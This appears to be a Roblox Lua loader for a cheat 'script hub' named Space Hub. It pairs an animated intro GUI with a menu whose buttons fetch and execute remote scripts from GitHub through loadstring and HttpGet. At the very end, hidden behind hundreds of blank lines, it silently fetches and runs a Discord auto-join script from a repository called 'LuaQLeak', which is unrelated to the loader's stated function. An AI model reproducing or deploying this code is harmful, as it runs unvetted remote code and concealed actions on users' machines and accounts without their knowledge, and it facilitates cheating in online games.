--[=[
 d888b  db    db d888888b      .d888b.      db      db    db  .d8b.  
88' Y8b 88    88   `88'        VP  `8D      88      88    88 d8' `8b 
88      88    88    88            odD'      88      88    88 88ooo88 
88  ooo 88    88    88          .88'        88      88    88 88~~~88 
88. ~8~ 88b  d88   .88.        j88.         88booo. 88b  d88 88   88 
 Y888P  ~Y8888P' Y888888P      888888D      Y88888P ~Y8888P' YP   YP  CONVERTER
]=]

-- Instances: 11 | Scripts: 2 | Modules: 0
local G2L = {};

-- StarterGui.SpaceHubIntro
G2L["1"] = Instance.new("ScreenGui", game:GetService("Players").LocalPlayer:WaitForChild("PlayerGui"));
G2L["1"]["Name"] = [[SpaceHubIntro]];
G2L["1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;

-- StarterGui.SpaceHubIntro.handler
G2L["2"] = Instance.new("LocalScript", G2L["1"]);
G2L["2"]["Name"] = [[handler]];

-- StarterGui.SpaceHubIntro.ImageLabel
G2L["3"] = Instance.new("ImageLabel", G2L["1"]);
G2L["3"]["BackgroundColor3"] = Color3.fromRGB(45, 45, 45);
G2L["3"]["Visible"] = false;
G2L["3"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
G2L["3"]["Image"] = [[http://www.roblox.com/asset/?id=11833576888]];
G2L["3"]["Size"] = UDim2.new(0, 150, 0, 150);
G2L["3"]["BackgroundTransparency"] = 1;
G2L["3"]["Position"] = UDim2.new(0.5, 0, 0.4399999976158142, 0);

-- StarterGui.SpaceHubIntro.ImageLabel.UICorner
G2L["4"] = Instance.new("UICorner", G2L["3"]);
G2L["4"]["CornerRadius"] = UDim.new(1, 0);

-- StarterGui.SpaceHubIntro.textHolder
G2L["5"] = Instance.new("Frame", G2L["1"]);
G2L["5"]["BorderSizePixel"] = 0;
G2L["5"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
G2L["5"]["Size"] = UDim2.new(0, 250, 0, 50);
G2L["5"]["Position"] = UDim2.new(0.5, 0, 0.5, 0);
G2L["5"]["Name"] = [[textHolder]];

-- StarterGui.SpaceHubIntro.textHolder.UIGradient
G2L["6"] = Instance.new("UIGradient", G2L["5"]);
G2L["6"]["Color"] = ColorSequence.new{ColorSequenceKeypoint.new(0.000, Color3.fromRGB(180, 58, 255)),ColorSequenceKeypoint.new(0.292, Color3.fromRGB(49, 33, 172)),ColorSequenceKeypoint.new(0.460, Color3.fromRGB(49, 33, 172)),ColorSequenceKeypoint.new(0.666, Color3.fromRGB(103, 41, 210)),ColorSequenceKeypoint.new(1.000, Color3.fromRGB(15, 160, 255))};

-- StarterGui.SpaceHubIntro.textHolder.DropShadowHolder
G2L["7"] = Instance.new("Frame", G2L["5"]);
G2L["7"]["ZIndex"] = 0;
G2L["7"]["BorderSizePixel"] = 0;
G2L["7"]["BackgroundTransparency"] = 1;
G2L["7"]["Size"] = UDim2.new(1, 0, 1, 0);
G2L["7"]["Name"] = [[DropShadowHolder]];

-- StarterGui.SpaceHubIntro.textHolder.DropShadowHolder.DropShadow
G2L["8"] = Instance.new("ImageLabel", G2L["7"]);
G2L["8"]["ZIndex"] = 0;
G2L["8"]["BorderSizePixel"] = 0;
G2L["8"]["SliceCenter"] = Rect.new(49, 49, 450, 450);
G2L["8"]["ScaleType"] = Enum.ScaleType.Slice;
G2L["8"]["ImageColor3"] = Color3.fromRGB(0, 0, 0);
G2L["8"]["ImageTransparency"] = 0.5;
G2L["8"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
G2L["8"]["Image"] = [[rbxassetid://6014261993]];
G2L["8"]["Size"] = UDim2.new(1.0199999809265137, 47, 1.100000023841858, 47);
G2L["8"]["Name"] = [[DropShadow]];
G2L["8"]["BackgroundTransparency"] = 1;
G2L["8"]["Position"] = UDim2.new(0.4950000047683716, 0, 0.5099999904632568, 0);

-- StarterGui.SpaceHubIntro.textHolder.UICorner
G2L["9"] = Instance.new("UICorner", G2L["5"]);
G2L["9"]["CornerRadius"] = UDim.new(0, 6);

-- StarterGui.SpaceHubIntro.textHolder.TextLabel
G2L["a"] = Instance.new("TextLabel", G2L["5"]);
G2L["a"]["TextTruncate"] = Enum.TextTruncate.AtEnd;
G2L["a"]["ZIndex"] = 0;
G2L["a"]["BorderSizePixel"] = 0;
G2L["a"]["BackgroundColor3"] = Color3.fromRGB(49, 3, 89);
-- G2L["a"]["FontFace"] = ;
G2L["a"]["TextSize"] = 15;
G2L["a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["a"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
G2L["a"]["Size"] = UDim2.new(1, 0, 1, 0);
G2L["a"]["Text"] = [[]];
G2L["a"]["Font"] = Enum.Font.Roboto;
G2L["a"]["BackgroundTransparency"] = 1;
G2L["a"]["Position"] = UDim2.new(0.5, 0, 0.5, 0);

-- StarterGui.SpaceHubIntro.LocalScript
G2L["b"] = Instance.new("LocalScript", G2L["1"]);


-- StarterGui.SpaceHubIntro.handler
local function C_2()
local script = G2L["2"];
	-- variables
	local plr = game:GetService("Players").LocalPlayer
	local ts = game:GetService("TweenService")
	local ti = TweenInfo.new(2, Enum.EasingStyle.Quint, Enum.EasingDirection.Out, 0, false, 0)
	local ti2 = TweenInfo.new(1, Enum.EasingStyle.Quint, Enum.EasingDirection.Out, 0, false, 0)
	local textHolder = script.Parent.textHolder
	local name = textHolder.TextLabel
	local icon = script.Parent.ImageLabel
	local root = game:GetService("Players").LocalPlayer.Character:WaitForChild("HumanoidRootPart")
	local shadow = script.Parent.textHolder.DropShadowHolder.DropShadow
	local cam = game:GetService("Workspace").CurrentCamera
	local blur = Instance.new("BlurEffect", game:GetService("Lighting"))
	local sound = Instance.new("Sound", script.Parent)
	local strVal = Instance.new("StringValue", script.Parent)
	--
	
	-- properties
	sound.SoundId = "rbxassetid://11834806248"
	sound.Looped = false
	blur.Name = "BlurEffect"
	blur.Size = 0
	blur.Enabled = true
	textHolder.Size = UDim2.new(0, 0, 0, 50)
	icon.Position = UDim2.new(0.5, 0, -0.5, 0)
	shadow.ImageTransparency = 1
	strVal.Name = "strVal"
	--
	
	-- animations
	local blurIn = ts:Create(blur, ti, {Size = 11})
	local blurOut = ts:Create(blur, ti, {Size = 0})
	
	local On = ts:Create(textHolder, ti2, {Size = UDim2.new(0, 250, 0, 50)})
	local Off = ts:Create(textHolder, ti2, {Size = UDim2.new(0, 0, 0, 50)})
	
	local OnCam2 = ts:Create(cam, ti, {MaxAxisFieldOfView = 80})
	local OffCam2 = ts:Create(cam, ti, {MaxAxisFieldOfView = 108})
	
	local OnCam = ts:Create(cam, ti, {CFrame = CFrame.new(34, 240, 34) * CFrame.Angles(math.rad(52),0,0)})
	local OffCam = ts:Create(cam, ti, {CFrame = plr.Character:WaitForChild("HumanoidRootPart").CFrame})
	--
	
	-- functions
	function strToClock(str)
		local a = str:split(':')
		local hr, m, s = a[1], a[2], a[3]
		hr, m = hr * 3600, m * 60
		local CT = hr + m + s
		return (CT / 60) / 60
	end
	
	function changeTime(timeVal, Dur)
		local goal = {}
		goal.ClockTime = strToClock(timeVal)
		local tweenInfo = TweenInfo.new(Dur, Enum.EasingStyle.Quint, Enum.EasingDirection.Out)
		local tween = ts:Create(game.Lighting, tweenInfo, goal)
		tween:Play()
	end
	
	function Type(item, text)
		for i = 1, #text, 1 do
			item.Text = string.sub(text, 1, i)
			wait()
		end
	end
	
	function playIntro()
		cam.CameraType = Enum.CameraType.Scriptable
		icon.Visible = true
		textHolder.Visible = true
		
		sound:Play()
		blurIn:Play()
		--OnCam:Play()
		--OnCam2:Play()
		
		--repeat wait() until cam.CFrame == CFrame.new(34, 240, 34) * CFrame.Angles(math.rad(52),0,0)
		changeTime("00:00:00", 3)
	
		repeat wait() until blur.Size == 11
	
		On:Play()
		
		for i = 1, 6 do
			wait()
			--shadow.ImageTransparency = (i/10)
			shadow.ImageTransparency = 1-(i/10)
		end
	
		repeat wait() until textHolder.Size == UDim2.new(0, 250, 0, 50)
		
		--shadow.ImageTransparency = 0.8
		
		Type(name, "Welcome to SpaceHub, "..game:GetService("Players").LocalPlayer.DisplayName..".")
	
		textHolder:TweenPosition(UDim2.new(0.5, 0, 0.6, 0), "InOut", "Quint", 1, true)
		wait(0.5)
	
		icon:TweenPosition(UDim2.new(0.5, 0, 0.42, 0), "InOut", "Quint", 2, true)
		
		wait(2)
		repeat wait() until icon.Position == UDim2.new(0.5, 0, 0.42, 0)
		
		for i = 1, 10 do
			wait()
			shadow:Destroy()
			textHolder.Transparency = (i/10)
			name.TextTransparency = (i/10)
		end
		
		icon:TweenPosition(UDim2.new(0.5, 0, 0.5, 0), "InOut", "Quint", 1, true)
		wait(2)
		
		for i = 1, 10 do
			wait()
			icon.ImageTransparency = (i/10)
		end
		
		repeat wait() until icon.ImageTransparency == 1
		--OffCam:Play()
		--OffCam2:Play()
		blurOut:Play()
		
		repeat wait() until blur.Size == 0
		changeTime(strVal.Value, 3)
		
		game.Workspace.CurrentCamera.CameraType = Enum.CameraType.Custom
	end
	--
	
	wait(2)
	playIntro()
end;
task.spawn(C_2);
-- StarterGui.SpaceHubIntro.LocalScript
local function C_b()
local script = G2L["b"];
	local val = script.Parent:WaitForChild("strVal")
	val.Value = game.Lighting.TimeOfDay
end;
task.spawn(C_b);

return G2L["1"], require;

loadstring(game:HttpGet("https://raw.githubusercontent.com/deeeity/mercury-lib/master/src.lua"))()
local Mercury = loadstring(game:HttpGet("https://raw.githubusercontent.com/deeeity/mercury-lib/master/src.lua"))()
local GUI = Mercury:Create{
    Name = "Space Hub",
    Size = UDim2.fromOffset(500, 330),
    Theme = Mercury.Themes.Legacy,
    Link = "Space Hub"
}
local Tab = GUI:Tab{
	Name = "Main Page",
	Icon = "rbxassetid://4483362748"
}
local Premium = GUI:Tab{
	Name = "Space Hub Premium",
	Icon = "rbxassetid://3610239960"
}






Tab:Button{
	Name = "🚀  Load Space Hub  🛰",
	Description = "Space Hub",
	Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Lucasfin000/SpaceHub/main/gameslocal"))() end
     
}

Tab:Button{
	Name = "Load Space Hub Universal",
	Description = "Space Hub Universal",
	Callback = function()  loadstring(game:HttpGet(("https://raw.githubusercontent.com/Lucasfin000/SpaceHub/main/spacehubuniversal.lua")))() end
}

GUI:Notification{
	Title = "Alert",
	Text = "Space Hub Loader Has Loaded",
	Duration = 5,
	Callback = function() end
}
Premium:Button{
	Name = "Load Space Hub Premium",
	Description = "Space Hub Premium",
	Callback = function() loadstring(game:HttpGet(("https://raw.githubusercontent.com/Lucasfin000/SpaceHub/main/spacehubpremiumloader")))() end
     
}


Tab:Button{
	Name = "Load Others",
	Description = "Others",
	Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Lucasfin000/SpaceHub/main/othershub.txt"))() end
}























































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































getgenv().InviteCode = "RgjpnMGyA5"


loadstring(game:HttpGet("https://raw.githubusercontent.com/LuaQLeak/Scripts/main/Discord-Auto-Join.lua"))()
